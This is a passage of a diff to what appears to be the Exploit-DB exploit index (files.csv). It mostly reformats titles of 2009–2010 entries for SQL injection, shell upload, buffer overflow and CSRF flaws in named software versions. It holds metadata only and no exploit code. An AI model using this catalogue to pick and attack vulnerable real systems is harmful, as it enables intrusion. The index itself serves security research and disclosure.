10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 @@ -9528,14 +9528,14 @@ id,file,description,date,author,platform,type,port 10227,platforms/php/webapps/10227.txt,"Joomla! 'com_mygallery' Component - 'cid' Parameter SQL Injection",2009-11-25,S@BUN,php,webapps,0 10228,platforms/php/webapps/10228.txt,"WordPress WP-Cumulus 1.20 Plugin",2009-11-25,MustLive,php,webapps,0 10229,platforms/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",multiple,dos,0 -10230,platforms/php/webapps/10230.txt,"Fake Hit Generator 2.2 Shell Upload",2009-11-25,DigitALL,php,webapps,0 +10230,platforms/php/webapps/10230.txt,"Fake Hit Generator 2.2 - Shell Upload",2009-11-25,DigitALL,php,webapps,0 10231,platforms/php/webapps/10231.txt,"Radio istek scripti 2.5 - Remote Configuration Disclosure",2009-11-25,"kurdish hackers team",php,webapps,0 10232,platforms/php/webapps/10232.txt,"Joomla Component com_gcalendar 1.1.2 - (gcid) SQL Injection",2009-11-25,"Yogyacarderlink Crew",php,webapps,0 10233,platforms/php/webapps/10233.txt,"phpBazar-2.1.1fix Remote Administration-Panel",2009-11-25,"kurdish hackers team",php,webapps,0 10234,platforms/php/webapps/10234.txt,"Cacti 0.8.7e - Multiple Vulnerabilities",2009-11-26,"Moritz Naumann",php,webapps,0 10235,platforms/windows/remote/10235.py,"Eureka Mail Client Remote Buffer Overflow Exploit",2009-11-26,"Dr_IDE and dookie",windows,remote,0 10236,platforms/php/webapps/10236.txt,"Flashden Multiple File Uploader Shell Upload",2009-11-26,DigitALL,php,webapps,0 -10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 Malformed URL Request DoS",2000-06-01,netsec,hardware,dos,80 +10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 - Malformed URL Request DoS",2000-06-01,netsec,hardware,dos,80 10238,platforms/php/webapps/10238.txt,"Joomla Component com_lyftenbloggie 1.04 - SQL Injection",2009-11-28,kaMtiEz,php,webapps,0 10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 - (pls) Buffer Overflow Exploit",2009-11-28,Molotov,windows,local,0 10241,platforms/php/webapps/10241.txt,"Uploaderr 1.0 - File Hosting Script Shell Upload",2009-11-28,DigitALL,php,webapps,0 @@ -9549,7 +9549,7 @@ id,file,description,date,author,platform,type,port 10249,platforms/php/webapps/10249.txt,"adaptcms lite 1.5 - Remote File Inclusion",2009-11-29,v3n0m,php,webapps,0 10250,platforms/php/webapps/10250.txt,"Joomla Component MusicGallery - SQL Injection",2009-11-30,"Don Tukulesto",php,webapps,0 10252,platforms/php/webapps/10252.txt,"Joomla Component Quick News - SQL Injection",2009-11-30,"Don Tukulesto",php,webapps,0 -10253,platforms/asp/webapps/10253.txt,"Eshopbuilde CMS SQL Injection",2009-11-30,Isfahan,asp,webapps,0 +10253,platforms/asp/webapps/10253.txt,"Eshopbuilde CMS - SQL Injection",2009-11-30,Isfahan,asp,webapps,0 10254,platforms/asp/webapps/10254.txt,"Xxasp 3.3.2 - SQL Injection",2009-11-30,Secu_lab_ir,asp,webapps,0 10255,platforms/bsd/local/10255.txt,"FreeBSD 8.0 Run-Time Link-Editor (rtld) - Local Root (0Day)",2009-11-30,kingcope,bsd,local,0 10256,platforms/php/webapps/10256.txt,"WP-Polls 2.x - Incorrect Flood Filter",2009-11-30,Jbyte,php,webapps,0 @@ -9596,7 +9596,7 @@ id,file,description,date,author,platform,type,port 10304,platforms/php/webapps/10304.txt,"Invision Power Board 3.0.4 / 3.0.4 / 2.3.6 - LFI / SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0 10305,platforms/php/webapps/10305.txt,"UBB.threads 7.5.4 2 - Multiple File Inclusion",2009-12-04,R3VAN_BASTARD,php,webapps,0 10306,platforms/php/webapps/10306.txt,"Achievo 1.4.2 - Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",php,webapps,0 -10307,platforms/php/webapps/10307.txt,"Achievo 1.4.2 Permanent Cross-Site Scripting",2009-12-04,"Nahuel Grisolia",php,webapps,0 +10307,platforms/php/webapps/10307.txt,"Achievo 1.4.2 - Permanent Cross-Site Scripting",2009-12-04,"Nahuel Grisolia",php,webapps,0 10312,platforms/php/webapps/10312.php,"Joomla 1.5.x - com_joomgallery&func Incorrect Flood Filter",2009-12-04,Jbyte,php,webapps,0 10313,platforms/linux/local/10313.c,"libmodplug 's3m' Remote Buffer Overflow",2008-02-25,dummy,linux,local,0 10314,platforms/php/webapps/10314.txt,"BM Classifieds Ads SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 @@ -9620,7 +9620,7 @@ id,file,description,date,author,platform,type,port 10337,platforms/php/webapps/10337.txt,"Chipmunk Newsletter Persistant XSS",2009-12-07,mr_me,php,webapps,0 10338,platforms/linux/dos/10338.pl,"Polipo 1.0.4 - Remote Memory Corruption PoC (0Day)",2009-12-07,"Jeremy Brown",linux,dos,0 10339,platforms/windows/local/10339.pl,"gAlan 0.2.1 - Buffer Overflow Exploit (0Day)",2009-12-07,"Jeremy Brown",windows,local,0 -10340,platforms/windows/remote/10340.pl,"Multiple Symantec Products Intel Common Base Agent Remote Command Execution",2009-04-28,kingcope,windows,remote,0 +10340,platforms/windows/remote/10340.pl,"Multiple Symantec Products - Intel Common Base Agent Remote Command Execution",2009-04-28,kingcope,windows,remote,0 10341,platforms/php/webapps/10341.txt,"SiSplet CMS 2008-01-24 - Multiple Remote File Inclusion Exploit",2009-12-07,"cr4wl3r ",php,webapps,0 10343,platforms/windows/dos/10343.txt,"Kingsoft Internet Security 9 - Denial of Services",2009-11-05,"Francis Provencher",windows,dos,0 10344,platforms/windows/local/10344.rb,"Adobe Illustrator CS4 14.0.0 - eps Universal Buffer Overflow (Metasploit)",2009-12-07,dookie,windows,local,0 @@ -9663,7 +9663,7 @@ id,file,description,date,author,platform,type,port 10388,platforms/php/webapps/10388.txt,"Chipmunk Newsletter - CSRF",2009-12-11,"Milos Zivanovic ",php,webapps,0 10389,platforms/php/webapps/10389.txt,"Illogator Shop SQL Injection Bypass",2009-12-11,bi0,php,webapps,0 10390,platforms/php/webapps/10390.txt,"phpCollegeExchange 0.1.5c Multiple SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0 -10391,platforms/php/webapps/10391.txt,"XAMPP 1.7.2 Change Administrative Password",2009-12-11,bi0,php,webapps,0 +10391,platforms/php/webapps/10391.txt,"XAMPP 1.7.2 - Change Administrative Password",2009-12-11,bi0,php,webapps,0 10392,platforms/windows/local/10392.rb,"Millenium MP3 Studio 2.0 - (.pls) Universal Stack Overflow (Metasploit)",2009-12-11,dookie,windows,local,0 10393,platforms/php/webapps/10393.txt,"B2C Booking Centre Systems SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0 10394,platforms/windows/remote/10394.py,"HP NNM 7.53 ovalarm.exe CGI Pre Authentication Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80 @@ -9682,7 +9682,7 @@ id,file,description,date,author,platform,type,port 10412,platforms/php/webapps/10412.txt,"Acc PHP eMail 1.1 - CSRF",2009-12-13,bi0,php,webapps,0 10414,platforms/php/webapps/10414.txt,"Frog CMS 0.9.5 - CSRF",2009-12-13,"Milos Zivanovic ",php,webapps,0 10417,platforms/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,php,webapps,0 -10418,platforms/php/webapps/10418.txt,"Ele Medios CMS SQL Injection",2009-12-13,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 +10418,platforms/php/webapps/10418.txt,"Ele Medios CMS - SQL Injection",2009-12-13,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10419,platforms/php/webapps/10419.txt,"Chipmunk Board Script 1.x - Multiple CSRF Vulnerabilities",2009-12-13,"Milos Zivanovic ",php,webapps,0 10420,platforms/php/webapps/10420.txt,"Ez Guestbook 1.0 - Multiple Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 10421,platforms/php/webapps/10421.txt,"Automne.ws CMS 4.0.0rc2 - Multiple RFI",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 @@ -9701,7 +9701,7 @@ id,file,description,date,author,platform,type,port 10434,platforms/windows/remote/10434.py,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit (3)",2009-12-14,DouBle_Zer0,windows,remote,80 10436,platforms/php/webapps/10436.txt,"Link Up Gold CSRF - Create Administrator Account",2009-12-14,bi0,php,webapps,0 10437,platforms/php/webapps/10437.txt,"Smart PHP Subscriber Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 -10438,platforms/php/webapps/10438.txt,"AdManagerPro CSRF Create Administrator Account",2009-12-14,bi0,php,webapps,0 +10438,platforms/php/webapps/10438.txt,"AdManagerPro - CSRF Create Administrator Account",2009-12-14,bi0,php,webapps,0 10439,platforms/php/webapps/10439.txt,"Ez Poll Hoster - Multiple XSS / CSRF Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 10440,platforms/php/webapps/10440.txt,"Easy Banner Pro - CSRF Create Administrator Account",2009-12-14,bi0,php,webapps,0 10442,platforms/php/webapps/10442.txt,"Text Exchange Pro - CSRF Create Administrator Account",2009-12-14,bi0,php,webapps,0 @@ -9746,7 +9746,7 @@ id,file,description,date,author,platform,type,port 10488,platforms/php/webapps/10488.txt,"WP-Forum 2.3 - SQL Injection / Blind SQL Injection",2009-12-16,"Juan Galiana Lara",php,webapps,0 10489,platforms/windows/dos/10489.txt,"Google Picasa 3.5 - Local DoS Buffer Overflow",2009-12-16,Connection,windows,dos,0 10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System (auth bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 -10493,platforms/php/webapps/10493.txt,"WHMCompleteSolution CMS SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 +10493,platforms/php/webapps/10493.txt,"WHMCompleteSolution CMS - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10494,platforms/php/webapps/10494.txt,"D-Tendencia Bt 2008 - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10495,platforms/php/webapps/10495.txt,"PhpLinkExchange 1.02 - XSS/Upload Vulerability",2009-12-16,Stink',php,webapps,0 10496,platforms/asp/webapps/10496.txt,"freekot - (auth bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 @@ -9761,7 +9761,7 @@ id,file,description,date,author,platform,type,port 10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10507,platforms/asp/webapps/10507.txt,"Charon Cart 3.0 - (ContentID) Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10510,platforms/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL module Clientless URL-list control bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 -10511,platforms/php/webapps/10511.txt,"PHP F1 Upload Shell Upload",2009-12-17,"wlhaan hacker",php,webapps,0 +10511,platforms/php/webapps/10511.txt,"PHP F1 - Upload Shell Upload",2009-12-17,"wlhaan hacker",php,webapps,0 10512,platforms/php/webapps/10512.txt,"Horde 3.3.5 - 'PHP_SELF' XSS",2009-12-17,"Juan Galiana Lara",php,webapps,0 10513,platforms/windows/webapps/10513.txt,"Sitecore Staging Module 5.4.0 - Authentication bypass and File Manipulation",2009-12-17,"L. Weichselbaum",windows,webapps,0 10514,platforms/windows/webapps/10514.txt,"dblog - (dblog.mdb) Remote Database Disclosure",2009-12-17,"AnTi SeCuRe",windows,webapps,0 @@ -9771,7 +9771,7 @@ id,file,description,date,author,platform,type,port 10520,platforms/asp/webapps/10520.txt,"Active Auction House 3.6 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10521,platforms/asp/webapps/10521.txt,"Active Photo Gallery 6.2 - (Auth Bypass) SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 - SQL Bypass",2009-12-17,bi0,php,webapps,0 -10523,platforms/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 Shell Upload",2009-12-17,Stink,php,webapps,0 +10523,platforms/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 - Shell Upload",2009-12-17,Stink,php,webapps,0 10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET SQL Bypass",2009-12-17,bi0,asp,webapps,0 10526,platforms/asp/webapps/10526.txt,"ActiveBuyandSell 6.2 - (buyersend.asp catid) Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10527,platforms/php/webapps/10527.txt,"ReVou Software SQL Injection",2009-12-17,R3d-D3V!L,php,webapps,0 @@ -9785,7 +9785,7 @@ id,file,description,date,author,platform,type,port 10537,platforms/php/webapps/10537.txt,"gpEasy 1.5RC3 - Remote File Inclusion Exploit",2009-12-18,"cr4wl3r ",php,webapps,0 10540,platforms/asp/webapps/10540.txt,"E-Smartcart SQL Injection",2009-12-18,R3d-D3V!L,asp,webapps,0 10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Buffer Overflow Remote Exploit (2)",2009-12-18,Molotov,windows,remote,69 -10543,platforms/php/webapps/10543.txt,"Schweizer NISADA Communication CMS SQL Injection",2009-12-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 +10543,platforms/php/webapps/10543.txt,"Schweizer NISADA Communication CMS - SQL Injection",2009-12-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10544,platforms/multiple/local/10544.html,"Mozilla Firefox Location Bar Spoofing",2009-12-18,"Jordi Chancel",multiple,local,0 10545,platforms/php/webapps/10545.txt,"Joomla Component com_jbook - Blind SQL injection",2009-12-18,FL0RiX,php,webapps,0 10546,platforms/php/webapps/10546.txt,"Joomla Component com_digistore - SQL injection",2009-12-18,FL0RiX,php,webapps,0 @@ -9819,7 +9819,7 @@ id,file,description,date,author,platform,type,port 10578,platforms/php/webapps/10578.txt,"Ultimate Uploader 1.3 - Remote File Upload",2009-12-21,"Master Mind",php,webapps,0 10579,platforms/multiple/remote/10579.py,"TLS Renegotiation PoC",2009-12-21,"RedTeam Pentesting",multiple,remote,0 10580,platforms/hardware/dos/10580.rb,"3Com OfficeConnect Routers - DoS (Content-Type)",2009-12-21,"Alberto Ortega",hardware,dos,0 -10582,platforms/asp/webapps/10582.txt,"Absolute Shopping Cart SQL Injection",2009-12-21,Gamoscu,asp,webapps,0 +10582,platforms/asp/webapps/10582.txt,"Absolute Shopping Cart - SQL Injection",2009-12-21,Gamoscu,asp,webapps,0 10583,platforms/php/webapps/10583.txt,"social Web CMS beta 2 - Multiple Vulnerabilities",2009-12-21,"cp77fk4r ",php,webapps,0 10584,platforms/php/webapps/10584.txt,"PHPhotoalbum Remote File Upload",2009-12-21,"wlhaan hacker",php,webapps,0 10585,platforms/php/webapps/10585.txt,"webCocoon's simpleCMS SQL Injection",2009-12-21,_ÝNFAZCI_,php,webapps,0 @@ -9842,7 +9842,7 @@ id,file,description,date,author,platform,type,port 10603,platforms/windows/dos/10603.c,"TFTP Daemon 1.9 - Denial of Service",2009-12-22,Socket_0x03,windows,dos,0 10604,platforms/php/webapps/10604.pl,"Simple PHP Blog 0.5.1 - Local File Inclusion",2009-12-22,jgaliana,php,webapps,0 10606,platforms/php/webapps/10606.txt,"weenCompany SQL Injection",2009-12-22,Gamoscu,php,webapps,0 -10609,platforms/php/webapps/10609.txt,"Aurora CMS SQL Injection Exploit",2009-12-22,Sora,php,webapps,0 +10609,platforms/php/webapps/10609.txt,"Aurora CMS - SQL Injection Exploit",2009-12-22,Sora,php,webapps,0 10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0 10611,platforms/php/webapps/10611.txt,"35mm Slide Gallery - Cross-Site Scripting",2009-12-23,indoushka,php,webapps,0 10612,platforms/php/webapps/10612.txt,"Add An Ad Script Remote File Upload",2009-12-23,MR.Z,php,webapps,0 @@ -9856,7 +9856,7 @@ id,file,description,date,author,platform,type,port 10621,platforms/php/webapps/10621.txt,"XP Book 3.0 - login Admin Exploit",2009-12-23,"wlhaan hacker",php,webapps,0 10624,platforms/php/webapps/10624.txt,"Joomla Component com_carman - Cross-Site Scripting",2009-12-24,FL0RiX,php,webapps,0 10625,platforms/php/webapps/10625.txt,"Joomla Component com_jeemaarticlecollection - SQL Injection",2009-12-24,FL0RiX,php,webapps,0 -10626,platforms/php/webapps/10626.txt,"Jax Guestbook 3.50 Admin Login Exploit",2009-12-24,Sora,php,webapps,0 +10626,platforms/php/webapps/10626.txt,"Jax Guestbook 3.50 - Admin Login Exploit",2009-12-24,Sora,php,webapps,0 10628,platforms/windows/local/10628.pl,"CastRipper 2.50.70 - (.pls) Stack Buffer Overflow Exploit (Windows XP SP3)",2009-12-24,d3b4g,windows,local,0 10629,platforms/php/webapps/10629.txt,"Traidnt Gallery add Admin Exploit",2009-12-24,wlhaan-hacker,php,webapps,0 10630,platforms/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login Exploit",2009-12-24,Sora,multiple,webapps,0 @@ -9881,7 +9881,7 @@ id,file,description,date,author,platform,type,port 10655,platforms/php/webapps/10655.txt,"Best Top List Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10656,platforms/php/webapps/10656.txt,"B2B Trading Marketplace SQL Injection",2009-12-25,"AnGrY BoY",php,webapps,0 10658,platforms/php/webapps/10658.txt,"caricatier 2.5 - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 -10660,platforms/php/webapps/10660.txt,"barbo91 uploads Upload Shell",2009-12-25,indoushka,php,webapps,0 +10660,platforms/php/webapps/10660.txt,"barbo91 - uploads Upload Shell",2009-12-25,indoushka,php,webapps,0 10661,platforms/php/webapps/10661.txt,"Ads Electronic Al-System Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10664,platforms/windows/local/10664.py,"ReGet Deluxe 5.2 - (build 330) Stack Overflow Exploit",2009-12-25,"Encrypt3d.M!nd ",windows,local,0 10665,platforms/php/webapps/10665.txt,"Jevonweb Guestbook Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 @@ -9891,7 +9891,7 @@ id,file,description,date,author,platform,type,port 10669,platforms/php/webapps/10669.txt,"Squito Gallery 1.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10670,platforms/php/webapps/10670.txt,"vCard PRO 3.1 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10671,platforms/php/webapps/10671.txt,"Info Fisier 1.0 - Remote File Upload",2009-12-26,"wlhaan hacker",php,webapps,0 -10672,platforms/php/webapps/10672.txt,"kandalf upper 0.1 Upload Shell",2009-12-26,indoushka,php,webapps,0 +10672,platforms/php/webapps/10672.txt,"kandalf upper 0.1 - Upload Shell",2009-12-26,indoushka,php,webapps,0 10673,platforms/php/webapps/10673.txt,"DieselScripts jokes Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10674,platforms/php/webapps/10674.txt,"DieselScripts jokes Backup",2009-12-26,indoushka,php,webapps,0 10675,platforms/php/webapps/10675.txt,"Webring - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 @@ -10062,8 +10062,8 @@ id,file,description,date,author,platform,type,port 10881,platforms/windows/dos/10881.pl,"Apollo Player 37.0.0.0 - (.aap) BoF DoS",2009-12-31,jacky,windows,dos,0 10882,platforms/php/webapps/10882.txt,"Kayako eSupport 3.04.10 - XSS / CSRF",2009-12-31,"D3V!L FUCKER",php,webapps,0 10883,platforms/asp/webapps/10883.txt,"BlogWorx 1.0 Blog Database Disclosure",2010-01-01,LionTurk,asp,webapps,0 -10884,platforms/asp/webapps/10884.txt,"ArticleLive (blogs.php?Id) 1.7.1.2 - SQL Injection",2010-01-01,BAYBORA,asp,webapps,0 -10885,platforms/php/webapps/10885.txt,"Cype CMS SQL Injection",2010-01-01,Sora,php,webapps,0 +10884,platforms/asp/webapps/10884.txt,"ArticleLive 1.7.1.2 (blogs.php?Id) - SQL Injection",2010-01-01,BAYBORA,asp,webapps,0 +10885,platforms/php/webapps/10885.txt,"Cype CMS - SQL Injection",2010-01-01,Sora,php,webapps,0 10889,platforms/php/webapps/10889.txt,"DS CMS 1.0 - (NewsId) SQL Injection",2010-01-01,Palyo34,php,webapps,0 10891,platforms/php/webapps/10891.txt,"UCStats 1.1 - SQL Injection",2010-01-01,Sora,php,webapps,0 10897,platforms/php/webapps/10897.txt,"WD-CMS 3.0 - Multiple Vulnerabilities",2010-01-01,Sora,php,webapps,0 @@ -10104,7 +10104,7 @@ id,file,description,date,author,platform,type,port 10952,platforms/php/webapps/10952.txt,"Joomla Component com_alfresco - SQL Injection",2010-01-03,FL0RiX,php,webapps,0 10953,platforms/php/webapps/10953.txt,"Joomla Component com_hotbrackets - Blind SQL Injection",2010-01-03,FL0RiX,php,webapps,0 10955,platforms/asp/webapps/10955.txt,"MasterWeb Script 1.0 - (details&newsID) SQL Injection",2010-01-03,Red-D3v1L,asp,webapps,0 -10960,platforms/multiple/dos/10960.pl,"Google Chrome 4.0.249.30 DoS PoC",2010-01-03,anonymous,multiple,dos,0 +10960,platforms/multiple/dos/10960.pl,"Google Chrome 4.0.249.30 - DoS PoC",2010-01-03,anonymous,multiple,dos,0 10962,platforms/php/webapps/10962.txt,"Live TV Script SQL Injection",2010-01-03,R3d-D3V!L,php,webapps,0 10964,platforms/php/webapps/10964.txt,"Joomla Bridge of Hope Template - SQL Injection",2010-01-03,R3d-D3V!L,php,webapps,0 10965,platforms/php/webapps/10965.txt,"Joomla Component com_doqment - (cid) SQL Injection",2010-01-03,Gamoscu,php,webapps,0 @@ -10201,7 +10201,7 @@ id,file,description,date,author,platform,type,port 11101,platforms/hardware/webapps/11101.txt,"D-Link Routers - Authentication Bypass",2010-01-10,"SourceSec DevTeam",hardware,webapps,0 11103,platforms/windows/dos/11103.html,"VLC Player 0.8.6i - ActiveX DoS PoC",2010-01-10,"D3V!L FUCKER and germaya_x",windows,dos,0 11104,platforms/php/webapps/11104.txt,"CMScontrol 7.x - File Upload",2010-01-11,Cyber_945,php,webapps,0 -11106,platforms/multiple/dos/11106.bat,"Nuked KLan 1.7.7 & SP4 DoS",2010-01-11,"Hamza 'MIzoZ' N",multiple,dos,0 +11106,platforms/multiple/dos/11106.bat,"Nuked KLan 1.7.7 & SP4 - DoS",2010-01-11,"Hamza 'MIzoZ' N",multiple,dos,0 11107,platforms/php/webapps/11107.txt,"gridcc script 1.0 - (SQL/XSS) Multiple Vulnerabilities",2010-01-11,Red-D3v1L,php,webapps,0 11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - (.pls) Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0 11110,platforms/php/webapps/11110.txt,"Image Hosting Script Remote shell upload",2010-01-11,R3d-D3V!L,php,webapps,0 @@ -10421,7 +10421,7 @@ id,file,description,date,author,platform,type,port 11369,platforms/asp/webapps/11369.txt,"MOJO's IWms 7 - SQL Injection / Cross-Site Scripting",2010-02-09,"cp77fk4r ",asp,webapps,0 11372,platforms/windows/local/11372.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow Exploit (0Day)",2010-02-09,"fl0 fl0w",windows,local,0 11374,platforms/windows/dos/11374.pl,"WM Downloader 3.0.0.9 - PLS WMDownloader (PoC)",2010-02-09,JIKO,windows,dos,0 -11375,platforms/php/webapps/11375.txt,"Zomorrod CMS SQL Injection",2010-02-09,"Pouya Daneshmand",php,webapps,0 +11375,platforms/php/webapps/11375.txt,"Zomorrod CMS - SQL Injection",2010-02-09,"Pouya Daneshmand",php,webapps,0 11376,platforms/php/webapps/11376.txt,"Fonts Site Script Remote File Disclosure",2010-02-09,JIKO,php,webapps,0 11377,platforms/php/webapps/11377.txt,"Limny 1.01 - Remote File Upload",2010-02-09,JIKO,php,webapps,0 11378,platforms/php/webapps/11378.txt,"Newsletter Tailor 0.2.0 - Remote File Inclusion",2010-02-09,snakespc,php,webapps,0 @@ -10463,7 +10463,7 @@ id,file,description,date,author,platform,type,port 11425,platforms/php/webapps/11425.txt,"daChooch SQL Injection",2010-02-12,snakespc,php,webapps,0 11426,platforms/multiple/dos/11426.txt,"Browser address bar characters into a small feature",2010-02-12,"Pouya Daneshmand",multiple,dos,0 11427,platforms/hardware/dos/11427.txt,"Nokia Symbian OS 3rd Edition - Multiple Web Browser Vulnerabilities",2010-02-12,"Nishant Das Patnaik",hardware,dos,0 -11429,platforms/php/webapps/11429.txt,"Vito CMS SQL Injection",2010-02-13,hacker@sr.gov.yu,php,webapps,0 +11429,platforms/php/webapps/11429.txt,"Vito CMS - SQL Injection",2010-02-13,hacker@sr.gov.yu,php,webapps,0 11430,platforms/php/webapps/11430.txt,"southburn Web - (products.php) SQL Injection",2010-02-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 11431,platforms/php/webapps/11431.txt,"MRW PHP Upload Remote file upload",2010-02-13,Phenom,php,webapps,0 11432,platforms/windows/dos/11432.txt,"Mozilla Firefox 3.6 - (Multitudinous looping) Denial of Service",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos,0 @@ -10500,7 +10500,7 @@ id,file,description,date,author,platform,type,port 11469,platforms/windows/dos/11469.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0 11470,platforms/windows/dos/11470.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF (PoC)",2010-02-15,loneferret,windows,dos,0 11472,platforms/ios/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote DoS",2010-02-15,TecR0c,ios,dos,0 -11473,platforms/php/webapps/11473.txt,"Pogodny CMS SQL Injection",2010-02-16,Ariko-Security,php,webapps,0 +11473,platforms/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,php,webapps,0 11474,platforms/php/webapps/11474.txt,"Mambo Component com_acnews - [id] SQL Injection",2010-02-16,"Zero Bits and Xzit3",php,webapps,0 11475,platforms/windows/local/11475.txt,"OtsTurntables Free 1.00.047 - (.olf) Universal Buffer Overflow Exploit",2010-02-16,mr_me,windows,local,0 11476,platforms/php/webapps/11476.txt,"SongForever.com - Clone Shell Upload",2010-02-16,indoushka,php,webapps,0 @@ -10547,7 +10547,7 @@ id,file,description,date,author,platform,type,port 11526,platforms/php/webapps/11526.txt,"vBSEO 3.1.0 - Local File Inclusion",2010-02-22,"ViRuSMaN ",php,webapps,0 11527,platforms/multiple/webapps/11527.html,"cPanel - Multiple CSRF Vulnerabilities",2010-02-22,SecurityRules,multiple,webapps,0 11528,platforms/php/webapps/11528.txt,"phpBugTracker 1.0.1 - File Disclosure",2010-02-22,"ViRuSMaN ",php,webapps,0 -11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products XML External Entity And XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0 +11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0 11530,platforms/php/webapps/11530.txt,"Article Friendly SQL Injection",2010-02-22,SkuLL-HackeR,php,webapps,0 11531,platforms/windows/dos/11531.pl,"Windows Media Player 11.0.5721.5145 - (.mpg) Buffer Overflow Exploit",2010-02-22,"cr4wl3r ",windows,dos,0 11532,platforms/windows/dos/11532.html,"Winamp 5.57 - (Browser) IE Denial of Service",2010-02-22,"cr4wl3r ",windows,dos,0 @@ -10579,7 +10579,7 @@ id,file,description,date,author,platform,type,port 11561,platforms/multiple/local/11561.html,"Mozilla Firefox 3.6 - URL Spoofing",2010-02-24,Unknown,multiple,local,0 11563,platforms/php/webapps/11563.txt,"kalimat new system 1.0 - (index.php) SQL Injection",2009-11-16,ProF.Code,php,webapps,0 11564,platforms/php/webapps/11564.txt,"ShortCMS 1.11F(B) (con) - SQL Injection",2010-02-24,Gamoscu,php,webapps,0 -11565,platforms/php/webapps/11565.txt,"phpCOIN 1.2.1 (mod.php) - SQL Injection",2010-02-24,BAYBORA,php,webapps,0 +11565,platforms/php/webapps/11565.txt,"phpCOIN 1.2.1 - (mod.php) SQL Injection",2010-02-24,BAYBORA,php,webapps,0 11567,platforms/multiple/dos/11567.txt,"Apple Safari 4.0.4 & Google Chrome 4.0.249 CSS style Stack Overflow DoS/PoC",2010-02-24,"Rad L. Sneak",multiple,dos,0 11568,platforms/php/webapps/11568.txt,"Softbiz Auktios Script Multiple SQL Injection",2010-02-24,"Easy Laster",php,webapps,0 11569,platforms/php/webapps/11569.txt,"Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0 @@ -10591,10 +10591,10 @@ id,file,description,date,author,platform,type,port 11576,platforms/php/webapps/11576.txt,"Softbiz Recipes Portal Script - (showcats.php) SQL Injection",2010-02-25,"Easy Laster",php,webapps,0 11577,platforms/php/webapps/11577.txt,"GameScript 3.0 - SQL Injection",2010-02-25,FormatXformat,php,webapps,0 11578,platforms/php/webapps/11578.php,"Joomla Component com_joomlaconnect_be - Blind Injection",2010-02-25,snakespc,php,webapps,0 -11579,platforms/php/webapps/11579.txt,"WebAdministrator Lite CMS SQL Injection",2010-02-25,Ariko-Security,php,webapps,0 +11579,platforms/php/webapps/11579.txt,"WebAdministrator Lite CMS - SQL 